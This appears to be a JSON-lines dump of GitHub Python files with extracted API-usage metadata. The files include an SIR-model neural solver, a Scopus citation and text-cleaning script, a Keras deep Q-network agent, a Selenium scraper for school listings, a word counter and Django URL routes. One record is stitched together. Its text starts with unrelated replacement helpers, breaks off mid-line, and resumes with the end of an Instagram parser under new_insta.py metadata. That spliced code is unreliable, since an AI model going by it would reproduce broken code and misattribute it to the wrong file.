"usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 334, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 339, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 341, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 343, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 346, "usage_type": "name"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 348, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 363, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 367, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 561, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 674, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 702, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 702, "usage_type": "attribute"}]}
+{"seq_id": "12357506201", "text": "import importlib\nimport inspect\nimport os\nimport sys\n\nfrom collections import defaultdict\n\n\ndef make_replace_for_doc(text):\n for to_replace in REPLACE_TO_EMPTY_STR:\n text = text.replace(to_replace, '')\n\n return text\n\n\ndef make_replace_for_response_and_value(text):\n for to_replace in REPLACE_TO_LIST:\n text = text.replace(to_replace, 'list')\n\n for _from, to in REPLACE_TO_ANOTHER.items():\n text = text.replace(_from, to)\n\n return text\n\n\ndef make_replace_for_constant(text):\n text = str(text)\n if ' number_of_followers or math.fabs(next_length - number_of_followers) < 5:\r\n break\r\n\r\ncursor.close()\r\ncon.close()\r\nbrowser.close()\r\n\r\n\r\n", "repo_name": "IbragimovaS/Parser", "sub_path": "new_insta.py", "file_name": "new_insta.py", "file_ext": "py", "file_size_in_byte": 8811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 66, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "ibm_db_dbi.connect", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "39292279938", "text": "from training import train\nfrom constants import ROOT_DIR\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom models import SIRNetwork\nfrom utils import SIR_solution\n\nif __name__ == '__main__':\n\n # Initial Conditions\n N = 1\n rescaling_factor = 1\n\n infected = 0.2\n susceptible = N - infected\n recovered = 0\n\n s_0 = susceptible / N * rescaling_factor\n i_0 = infected / N * rescaling_factor\n r_0 = 0\n\n # Equation parameters\n initial_conditions = [0, [s_0, i_0, r_0]]\n beta = round(0.8, 2)\n gamma = round(0.2, 2)\n\n # Sanity check\n assert i_0 + s_0 + r_0 == rescaling_factor\n\n # Model parameters\n t_final = 20\n train_size = 2500\n decay = 0.0\n hack_trivial = False\n epochs = 1000\n lr = 8e-4\n\n # Scipy solver solution\n t = np.linspace(0, t_final, t_final)\n s_p, i_p, r_p = SIR_solution(t, s_0, i_0, r_0, beta, gamma)\n\n # Init model\n sir = SIRNetwork(layers=2, hidden=50)\n\n try:\n # It tries to load the model, otherwise it trains it\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n except FileNotFoundError:\n # Train\n optimizer = torch.optim.Adam(sir.parameters(), lr=lr)\n writer = SummaryWriter(\n 'runs/' + 's_0={:.2f}-i_0={:.2f}-r_0={:.2f}-t_0={:.2f}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[\n 0],\n t_final, beta,\n gamma))\n sir, train_losses, run_time, optimizer = train(sir, initial_conditions, t_final=t_final, epochs=epochs,\n num_batches=10, hack_trivial=hack_trivial,\n train_size=train_size, optimizer=optimizer,\n decay=decay,\n writer=writer, beta=beta, gamma=gamma)\n # Save the model\n torch.save({'model_state_dict': sir.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()},\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final,\n beta,\n gamma))\n # Load the checkpoint\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n\n # Load the model\n sir.load_state_dict(checkpoint['model_state_dict'])\n\n # Test between 0 and t_final\n grid = torch.arange(0, t_final, out=torch.FloatTensor()).reshape(-1, 1)\n t_dl = DataLoader(dataset=grid, batch_size=1, shuffle=False)\n s_hat = []\n i_hat = []\n r_hat = []\n\n for i, t in enumerate(t_dl, 0):\n # Network solutions\n s, i, r = sir.parametric_solution(t, initial_conditions)\n s_hat.append(s.item())\n i_hat.append(i.item())\n r_hat.append(r.item())\n\n # Colors and Linewidth\n blue = '#3366ff'\n red = '#cc0000'\n green = '#13842e'\n linewidth = 1.5\n # Plot network solutions\n plt.figure(figsize=(12, 5))\n plt.plot(range(len(s_hat)), s_hat, label='Susceptible', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_hat)), i_hat, label='Infected', color=red, linewidth=linewidth)\n plt.plot(range(len(r_hat)), r_hat, label='Recovered', color=green, linewidth=linewidth)\n plt.plot(range(len(s_p)), s_p, label='Susceptible - Scipy', linestyle='--', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_p)), i_p, label='Infected - Scipy', linestyle='--', color=red, linewidth=linewidth)\n plt.plot(range(len(r_p)), r_p, label='Recovered - Scipy', linestyle='--', color=green, linewidth=linewidth)\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.legend(loc='lower right')\n plt.xlabel('Time')\n plt.ylabel('S(t), I(t), R(t)')\n plt.savefig(\n ROOT_DIR + '/plots/SIR_s0={:.2f}_i0={:.2f}_r0={:.2f}_beta={}_gamma={}.png'.format(s_0, i_0, r_0, beta, gamma))\n plt.show()\n\n # Compute loss as a function of the time\n log_losses = []\n for i, t in enumerate(t_dl, 0):\n from losses import sir_loss\n\n t.requires_grad = True\n s, i, r = sir.parametric_solution(t, initial_conditions)\n t_loss = sir_loss(t, s, i, r, beta, gamma)\n log_losses.append(np.log(t_loss.item()))\n\n plt.figure(figsize=(15, 5))\n plt.plot(range(len(log_losses)), log_losses)\n plt.xlabel('Time')\n plt.ylabel('Logloss')\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.show()\n", "repo_name": "tmscarla/improving-transfer-learning", "sub_path": "differential-equations/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.SIR_solution", "line_number": 43, "usage_type": "call"}, {"api_name": "models.SIRNetwork", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 60, "usage_type": "call"}, {"api_name": "training.train", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 73, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 83, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "constants.ROOT_DIR", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "losses.sir_loss", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]}
+{"seq_id": "29232882305", "text": "#!/usr/bin/python3\n'''\nNew module, used for working with ncbi data.\n'''\nimport pandas as pd\nimport numpy as np\nimport requests\nimport os\nimport sys\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\ntry:\n API = os.environ['ELSKEY']\nexcept:\n print(\"Need to source the API keys!\")\n\ndef get_citedby(PMID):\n '''\n Get number of citations for an articles based on PMC code. Uses Elsevier API.\n '''\n try: \n scopus = requests.get('http://api.elsevier.com/content/search/scopus?query=PMID(%s)&field=citedby-count' % PMID, headers={'X-ELS-APIKEY':API})\n return scopus.json()['search-results']['entry'][0]['citedby-count']\n except Exception as e:\n print(e)\n return np.nan\n\ndef create_scopus_link(pmids):\n '''\n Creates a link to make a query about 25 articles (based on PMC codes).\n '''\n beg = 'http://api.elsevier.com/content/search/scopus?query=PMID(%s)' % pmids[0]\n final = [beg]\n end = '&field=citedby-count'\n for l in pmids[1:]:\n final.append('+OR+PMID(%s)' % l)\n return ''.join(final)\n\ndef get_25_citedby(pmids, output):\n '''\n Records info about 25 articles as a tsv file\n '''\n link = create_scopus_link(pmids)\n try:\n json = requests.get(link, headers={'X-ELS-APIKEY':API}).json()['search-results']['entry']\n except:\n print(\"Unable to send request\")\n return\n for pmid, info in zip(pmids,json):\n try:\n date = info['prism:coverDate']\n citedby = info['citedby-count']\n title = info['dc:title']\n pubmed = info['pubmed-id']\n with open(output, 'a+') as output:\n output.write('%s\\t%s\\t%s\\t%s\\t%s\\n' % (pmid, date, citedby, title, pubmed))\n except:\n print('Unable to retrieve article with PMID %s' % pmid)\n\n\ndef clean_text(location, new_location):\n '''\n Clean a textfile, save a new one\n '''\n stop = stopwords.words('english')\n def remove_stop(word):\n if word not in stop:\n return word\n else:\n return np.nan\n stemmer = PorterStemmer()\n file = open(location, 'r').read()\n l = file.split('====')\n body = l[2]\n body = pd.Series(body.split())\n body = body.str.lower()\n body = body[~body.str.contains('www|http|@')]\n body = body.str.replace('[^\\w\\s]', '')\n body = body[~body.str.contains('^\\d+$')]\n body = body.apply(remove_stop).dropna()\n body = body.apply(stemmer.stem)\n body.to_csv(new_location, index=False)\n return body\n\ndef clean_all_files_in_dir(inpdir, outdir):\n for f in os.listdir(inpdir):\n try:\n clean_text(inpdir+f, outdir+f)\n except Exception as e:\n print(e)\n\n", "repo_name": "ilsenatorov/articles", "sub_path": "mining.py", "file_name": "mining.py", "file_ext": "py", "file_size_in_byte": 2734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 72, "usage_type": "attribute"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "74594433767", "text": "import copy\nimport random\n\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adadelta\n\n# A system for steering based on the center line of the road using a deep Q-network, meaning the network\n# gradually learns while attempting to drive the car\n# Created by brendon-ai, January 2018\n\n# The base discount rate, which should be between 0 and 1\nBASE_DISCOUNT = 0.8\n\n# The initial value exploration rate used for the reinforcement learning algorithm\nEPSILON_INITIAL = 1.0\n# The decay value by which the epsilon is multiplied every iteration\nEPSILON_DECAY = 0.9999\n# The minimum value that epsilon can decay to\nEPSILON_MIN = 0.01\n# The minimum number of examples in the memory before training begins\nMIN_TRAINING_EXAMPLES = 100\n\n\n# The deep Q-network agent, including a neural network but handling training and other functionality\nclass DeepQNetworkAgent:\n\n # Initialize the agent including the model and other attributes\n def __init__(self, state_size, action_size):\n # Initialize the value of epsilon which will be changed over the life of the agent\n self.epsilon = EPSILON_INITIAL\n\n # Initialize the agent's memory, which will store past time steps for training\n self.memory = []\n\n # Set the provided state size and action size as global variables\n self.state_size = state_size\n self.action_size = action_size\n\n # Use a rectified linear activation function\n activation = 'tanh'\n # Create the neural network model simply using a series of dense layers\n self.model = Sequential([\n Dense(3, input_shape=(self.state_size,), activation=activation),\n Dense(5, activation=activation),\n Dense(self.action_size)\n ])\n # Use an Adam optimizer with the predefined learning rate\n optimizer = Adadelta()\n # Compile the model with a mean squared error loss\n self.model.compile(\n loss='mse',\n optimizer=optimizer\n )\n\n # Add a set of values packaged as a single time step to the memory, and update rewards for previous memories\n def remember(self, state, action, reward, done):\n # Add the new value to the memory as it is (it will be updated to accommodate future rewards later)\n self.memory.append([state, action, reward, done])\n # Get the index of the most recent element in the memory\n max_memory_index = len(self.memory) - 1\n # Iterate over all indices in the array, excluding the one that was just added, in reverse\n for memory_index in reversed(range(max_memory_index)):\n # If the game ended at this example, it had no bearing on future rewards, so iteration should stop\n memory_example = self.memory[memory_index]\n if memory_example[3]:\n break\n\n # Get the age of this memory example (the number of examples that have been added since this one)\n age = max_memory_index - memory_index\n # Take the discount to the power of the age of this example\n # This will exponentially discount the value of the current reward for older examples in the memory\n discount = BASE_DISCOUNT ** age\n # Multiply the current reward by this discount and add it to the reward for this previous example\n memory_example[2] += reward * discount\n\n # Run a prediction on a state and return an array of predicted rewards for each possible action\n def predict(self, state):\n # Use the neural network to process the state directly\n network_output = self.model.predict(state)\n # Return the first element of the output on the first axis, effectively removing the single-element batch axis\n return network_output[0]\n\n # Act based on a provided state, choosing either to explore or to act based on past learning\n def act(self, state):\n # Choose randomly whether or not to act randomly, depending on the exploration rate\n if np.random.rand() <= self.epsilon:\n # Choose a random value less than the number of valid actions\n return random.randrange(self.action_size)\n # Otherwise, an action must be chosen based on the current state\n else:\n # Use the neural network to predict the reward for each of the valid actions\n reward_predictions = self.predict(state)\n # The actions is the index of the maximum predicted reward\n return np.argmax(reward_predictions)\n\n # Decay the epsilon so that actions become more frequently determined by the network rather than randomly\n def decay(self):\n # If the epsilon has not already gone as low as it is allowed to\n if self.epsilon > EPSILON_MIN:\n # Multiply it by the decay factor\n self.epsilon *= EPSILON_DECAY\n\n # Train the neural network model; this is to be iterated over, and yields the loss or None on each iteration\n def train(self):\n # Run an infinite loop in which the training is done\n while True:\n # Yield immediately if there is less than a specified number of training examples in the memory, so that the\n # network does not quickly overfit on a very small number of examples\n if len(self.memory) < MIN_TRAINING_EXAMPLES:\n yield None\n\n # Iterate over the entire memory in a random order\n memory_random = copy.copy(self.memory)\n random.shuffle(memory_random)\n for state, action, reward, _ in memory_random:\n # Make a prediction based on this state, but replace the reward for the action on this time step\n target_prediction = self.model.predict(state)\n target_prediction[0, action] = reward\n # Train the model based on this modified prediction, getting the most recent loss value\n loss = self.model.fit(x=state, y=target_prediction, epochs=1, verbose=0).history['loss'][0]\n # Yield the loss to the calling loop so that inference can be done between any pair of training runs\n yield loss\n", "repo_name": "bfmat/LaneDetection", "sub_path": "model/deep_q_network_agent.py", "file_name": "deep_q_network_agent.py", "file_ext": "py", "file_size_in_byte": 6194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.Sequential", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adadelta", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}]}
+{"seq_id": "74899928169", "text": "import csv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass EscolaScraper:\n def __init__(self, nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade):\n self.nome = nome\n self.endereco = endereco\n self.cidade = cidade\n self.estado = estado\n self.telefone = telefone\n self.cep = cep\n self.nivel_escolaridade = nivel_escolaridade\n\n\ndef coletar_escolas():\n escolas = []\n\n\n service = Service('/Users/joaosilva/Downloads/chromedriver_mac64/chromedriver') # Substitua pelo caminho do chromedriver\n options = Options()\n options.add_argument('--headless') # Executar o Chrome em modo headless (sem interface gráfica)\n driver = webdriver.Chrome(service=service, options=options)\n\n\n driver.get('https://www.google.com')\n search_box = driver.find_element(By.NAME, 'q')\n search_box.send_keys('escolas de tres lagoas')\n search_box.send_keys(Keys.RETURN)\n\n resultados = driver.find_elements(By.CLASS_NAME, 'g')\n\n for resultado in resultados:\n try:\n nome = resultado.find_element(By.TAG_NAME, 'h3').text\n endereco = resultado.find_element(By.CSS_SELECTOR, 'div.VkpGBb').text\n cidade_estado = resultado.find_element(By.CSS_SELECTOR, 'span.B6fmyf').text\n telefone = resultado.find_element(By.CSS_SELECTOR, 'div.xpdopen > div > div > div > span').text\n cep = resultado.find_element(By.CSS_SELECTOR, 'span.LrzXr').get_attribute('data-attrid')\n nivel_escolaridade = resultado.find_element(By.CSS_SELECTOR, 'div.qsm0tb').text\n\n cidade_estado_split = cidade_estado.split(',')\n cidade = cidade_estado_split[0].strip()\n estado = cidade_estado_split[1].strip()\n\n escola = EscolaScraper(nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade)\n escolas.append(escola)\n except Exception as e:\n print(f\"Erro ao extrair informações: {str(e)}\")\n\n driver.quit()\n\n return escolas\n\n\ndef salvar_csv(escolas):\n with open('escolas.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow(['Nome', 'Endereço', 'Cidade', 'Estado', 'Telefone', 'CEP', 'Nível de Escolaridade'])\n for escola in escolas:\n writer.writerow([escola.nome, escola.endereco, escola.cidade, escola.estado, escola.telefone,\n escola.cep, escola.nivel_escolaridade])\n\n\nescolas = coletar_escolas()\nsalvar_csv(escolas)", "repo_name": "JPGSilva/web-scraping", "sub_path": "EscolaScraper.py", "file_name": "EscolaScraper.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 42, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "6679857745", "text": "from collections import Counter\nimport os\n\n\ndef get_words_perline(file_name):\n \"\"\"\n 获取每行的单词\n :type file_name: 文件名\n \"\"\"\n lines = []\n\n if os.path.exists(file_name):\n with open(file_name, 'r') as f:\n for line in f:\n lines.append(line.split())\n return lines\n\n\ndef get_word_count(file_name):\n \"\"\"\n 统计单词出现次数\n :type file_name: 文件名\n \"\"\"\n lines = get_words_perline(file_name)\n cnt = Counter()\n for line in lines:\n cnt = cnt + Counter(line)\n return cnt\n\n\ndef get_import_word(file_name):\n cnt = get_word_count(file_name)\n print(cnt)\n import_list = cnt.most_common(1)\n print('the most import word is:' + import_list[0][0])\n\nif __name__ == \"__main__\":\n get_import_word(\"word.txt\")\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0007/codes/0006.py", "file_name": "0006.py", "file_ext": "py", "file_size_in_byte": 810, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "23096688333", "text": "from django.conf.urls import include, url\nfrom vsf_user.front import views\n\n\nurlpatterns = [\n url(\n r'^list-apikey/$',\n views.ListAPIUsers.as_view(),\n name='api-users-list'\n ),\n url(\n r'^list-apikey-ajax/$',\n views.APIUsersDataTableAjax.as_view(),\n ),\n url(\n r'^(?P[0-9]+)/delete-apikey/$',\n views.DeleteAPIUsers.as_view(),\n name='api-users-delete'\n ),\n\n]\n", "repo_name": "VEinteligente/vsf-incidents-server", "sub_path": "vsf_user/front/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers", "line_number": 8, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers.as_view", "line_number": 17, 